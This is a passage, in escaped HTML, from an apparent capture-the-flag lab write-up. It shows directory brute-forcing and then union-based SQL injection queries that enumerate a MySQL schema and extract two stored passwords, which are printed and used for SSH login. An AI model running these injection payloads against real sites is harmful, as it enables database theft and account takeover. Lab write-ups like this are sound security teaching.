&lt;p&gt;Let’s also hit the target with &lt;a href=&quot;https://github.com/Oj/gobuster&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;gobuster&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;gobuster&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-t&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 50&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; dir&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-u&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http://10.10.105.134&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-w&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;This reveals some interesting directories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/assets is unsecured and contains site assets, and reveals that we’re running Apache 2.4.18 on Ubuntu.&lt;/li&gt;
&lt;li&gt;/delete is a plain text file: “New priv esc for Ubuntu?? Change MySQL password on main system!”&lt;/li&gt;
&lt;li&gt;/server-status is forbidden (which is not surprising).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Out of curiosity, I tried loading &lt;code&gt;/item.php?id=robots.txt&lt;/code&gt; to see if I could get file inclusion without ascending. This doesn’t work, but throws another SQL error: “Unknown column ‘robots.txt in ‘where clause’”. This indicates that we’re definitely vulnerable to some kind of injection, since robots.txt is being treated as a column spec. In fact, this indicates that there must not be any quoting going on at all!&lt;/p&gt;
&lt;p&gt;And indeed, trying &lt;code&gt;/item.php?id=0 or 1=1&lt;/code&gt; brings up the same broken page as &lt;code&gt;/item.php?id=100&lt;/code&gt;. So I think what’s going on here is that /item.php is just doing some string filtering (it looks like it’s probably also checking if you’re trying to include a real file, as attempting to include non-existent files &lt;em&gt;doesn’t&lt;/em&gt; trigger it).&lt;/p&gt;
&lt;p&gt;What the hell, let’s throw &lt;a href=&quot;https://sqlmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;SQLMap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; at it anyway!&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sqlmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -u&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http://10.10.105.134/item.php?id=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;       --dbms=mysql&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; --dump-all&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; --batch&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Well, that didn’t work.&lt;/p&gt;
&lt;p&gt;Meanwhile, futzing around by hand I find that &lt;code&gt;/item.php?id=0 union select null, null, null, null, null&lt;/code&gt; works and displays a slightly &lt;em&gt;different&lt;/em&gt; error page (so, whatever the &lt;code&gt;id&lt;/code&gt; variable is being pushed into must be at the very end of the SQL statement). And, while “&lt;code&gt;&#039;&lt;/code&gt;” triggers the annoying error page, using a double quote (“&lt;code&gt;&quot;&lt;/code&gt;”) does not.  Using a bit of trial-and error, we can determine that all but the first of these columns are usable, though the fourth place is easiest to read. This at least let’s us figure out our first few flags.&lt;/p&gt;
&lt;p&gt;The database also appears to be running as root. Ruh roh!&lt;/p&gt;
&lt;p&gt;Now that we’re getting the hang of this, we can extract more information by using queries of the form: &lt;code&gt;/item.php?id=0 union (select null, null, null, &quot;something&quot;, null)&lt;/code&gt;. I’m going to focus on the actual SQL inside of these parenthesis.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;select&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt; null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot; data-token-type=&quot;function&quot;&gt;, count(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;*&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;), &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt; from&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; mysql&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;user&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;We have four users. We can enumerate them by replacing &lt;code&gt;count(*)&lt;/code&gt; with &lt;code&gt;User&lt;/code&gt; and tacking on a &lt;code&gt;limit&lt;/code&gt; clause; this just reveals that the only users are root and three standard Debian system users that are used for upgrades and maintenance.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;select&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt; null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot; data-token-type=&quot;function&quot;&gt;, count(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;*&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;), &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;from&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; information_schema&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;tables&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;This reveals that there are 282 tables managed by this MySQL instance (ouch!). But how many tables are in the &lt;code&gt;park&lt;/code&gt; database (which is what’s serving up this site)?&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;select&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt; null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot; data-token-type=&quot;function&quot;&gt;, count(&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;*&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;), &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;from&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; information_schema&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;tables&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;where&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; table_schema &lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt; &quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;park&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Only two. That seems much better. I wonder what they are?&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;select&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt; null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, table_name, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;from&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; information_schema&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;tables&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;where&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; table_schema &lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt; &quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;park&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;limit&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 0&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;So we have two tables, &lt;code&gt;items&lt;/code&gt; and &lt;code&gt;users&lt;/code&gt;. Let’s see what the columns of the &lt;code&gt;users&lt;/code&gt; table are.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;select&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt; null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, column_name, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;from&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; information_schema&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;columns&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;where&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; table_schema &lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt; &quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;park&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;	and&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt; table_name &lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt; &quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;users&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;limit&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 0&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;So, the columns are &lt;code&gt;id&lt;/code&gt;, &lt;code&gt;username&lt;/code&gt;, and &lt;code&gt;password&lt;/code&gt;. Nice. Let’s dig into that table.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;sql&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;select&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt; null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;password&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;null&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;from&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; park&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;users&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;limit&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 0&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Unfortunately, trying to include the &lt;code&gt;username&lt;/code&gt; column triggers the annoying error, so all we can retrieve are two passwords, &lt;code&gt;D0nt3ATM3&lt;/code&gt; and &lt;code&gt;ih8dinos&lt;/code&gt;. Just for grins (and clued in by the structure of the flag questions), let’s see if we can SSH into the box as either of these using the user dennis.&lt;/p&gt;
&lt;p&gt;The second works for this purpose, and the first flag is right in dennis’ home directory.&lt;/p&gt;
